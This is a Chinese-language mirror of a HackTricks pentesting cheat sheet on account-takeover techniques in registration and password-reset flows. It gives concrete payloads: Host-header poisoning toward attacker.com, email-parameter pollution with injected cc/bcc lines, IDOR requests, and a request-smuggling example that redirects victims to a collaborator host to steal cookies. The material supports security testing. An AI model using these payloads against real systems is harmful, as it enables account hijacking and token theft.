Mirrors/hacktricks

Fork 0

mirror of https://github.com/carlospolop/hacktricks synced 2024-11-23 13:13:41 +00:00

Translator workflow a21a0e7217 Translated to Chinese

2023-08-03 19:12:22 +00:00

9.6 KiB

Raw Blame History

注册和接管漏洞

☁️ HackTricks云 ☁️ -🐦 推特 🐦 - 🎙️ Twitch 🎙️ - 🎥 YouTube 🎥

你在一家网络安全公司工作吗？你想在HackTricks中看到你的公司广告吗？或者你想获得PEASS的最新版本或下载PDF格式的HackTricks吗？请查看订阅计划！
发现我们的独家NFTs收藏品The PEASS Family
获取官方PEASS和HackTricks周边产品
加入💬 Discord群组或电报群组，或关注我在Twitter上的🐦@carlospolopm。
通过向hacktricks repo 和hacktricks-cloud repo 提交PR来分享你的黑客技巧。

注册接管

重复注册

尝试使用已存在的用户名生成
检查变化的电子邮件：
大写
+1@
在电子邮件中添加一些内容
电子邮件名称中的特殊字符（%00，%09，%20）
在电子邮件后面放置黑色字符：test@test.com a
victim@gmail.com@attacker.com
victim@attacker.com@gmail.com

用户名枚举

检查是否可以确定应用程序中是否已经注册了用户名。

密码策略

创建用户时检查密码策略（检查是否可以使用弱密码）。
在这种情况下，您可以尝试暴力破解凭据。

SQL注入

查看此页面以了解如何通过注册表单中的SQL注入尝试接管账户或提取信息。

Oauth接管

{% content-ref url="oauth-to-account-takeover.md" %} oauth-to-account-takeover.md {% endcontent-ref %}

SAML漏洞

{% content-ref url="saml-attacks/" %} saml-attacks {% endcontent-ref %}

更改电子邮件

注册后尝试更改电子邮件，并检查此更改是否被正确验证或是否可以将其更改为任意电子邮件。

重置密码接管

通过引用者泄漏重置密码令牌

使用您的电子邮件地址请求重置密码
单击重置密码链接
不要更改密码
单击任何第三方网站（例如：Facebook，Twitter）
拦截Burp Suite代理中的请求
检查引用者标头是否泄漏重置密码令牌。

重置密码篡改

在Burp Suite中拦截密码重置请求
在Burp Suite中添加或编辑以下标头：Host: attacker.com，X-Forwarded-Host: attacker.com
使用修改后的标头转发请求
http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com
查找基于_host header_的密码重置URL，例如：https://attacker.com/reset-password.php?token=TOKEN

通过电子邮件参数重置密码

# parameter pollution
email=victim@mail.com&email=hacker@mail.com

# array of emails
{"email":["victim@mail.com","hacker@mail.com"]}

# carbon copy
email=victim@mail.com%0A%0Dcc:hacker@mail.com
email=victim@mail.com%0A%0Dbcc:hacker@mail.com

# separator
email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com

API参数中的IDOR漏洞

攻击者必须使用自己的账户登录并进入更改密码功能。
启动Burp Suite并拦截请求。
将请求发送到重复器选项卡并编辑参数：用户ID/电子邮件
powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})

弱密码重置令牌

密码重置令牌应该是每次随机生成且唯一的。
尝试确定令牌是否过期或是否始终相同，在某些情况下，生成算法可能较弱且可以被猜测。以下变量可能被算法使用。

时间戳
用户ID
用户电子邮件
名字和姓氏
出生日期
加密
仅数字
小令牌序列（字符在[A-Z,a-z,0-9]之间）
令牌重用
令牌过期日期

泄露密码重置令牌

使用API/UI触发特定电子邮件的密码重置请求，例如：test@mail.com
检查服务器响应并查找resetToken
然后在URL中使用令牌，如https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]

通过用户名冲突进行密码重置

使用与受害者用户名相同的用户名在系统上注册，但在用户名之前和/或之后插入空格，例如："admin "
使用恶意用户名请求密码重置。
使用发送到您的电子邮件的令牌重置受害者密码。
使用新密码连接到受害者账户。

CTFd平台易受此攻击影响。
参见：CVE-2020-7245

通过跨站脚本攻击实现账户接管

在应用程序或子域中找到XSS漏洞（如果cookie的范围限定在父域名：*.domain.com）。
泄露当前的会话cookie。
使用cookie进行用户身份验证。

通过HTTP请求走私实现账户接管

使用smuggler检测HTTP请求走私的类型（CL、TE、CL.TE）
powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h\
构造一个请求，将POST / HTTP/1.1覆盖为以下数据：
GET http://something.burpcollaborator.net HTTP/1.1 X:，目标是将受害者重定向到burpcollab并窃取其cookie。
最终请求可能如下所示：

GET / HTTP/1.1
Transfer-Encoding: chunked
Host: something.com
User-Agent: Smuggler/v1.0
Content-Length: 83
0

GET http://something.burpcollaborator.net  HTTP/1.1
X: X

Hackerone报告利用此漏洞
* https://hackerone.com/reports/737140
* https://hackerone.com/reports/771666

通过CSRF接管账户

创建CSRF的有效负载，例如：“自动提交密码更改的HTML表单”
发送有效负载

通过JWT接管账户

JSON Web Token可能用于用户身份验证。

编辑JWT以更改用户ID/电子邮件
检查弱JWT签名

{% content-ref url="hacking-jwt-json-web-tokens.md" %} hacking-jwt-json-web-tokens.md {% endcontent-ref %}

参考资料

https://salmonsec.com/cheatsheet/account_takeover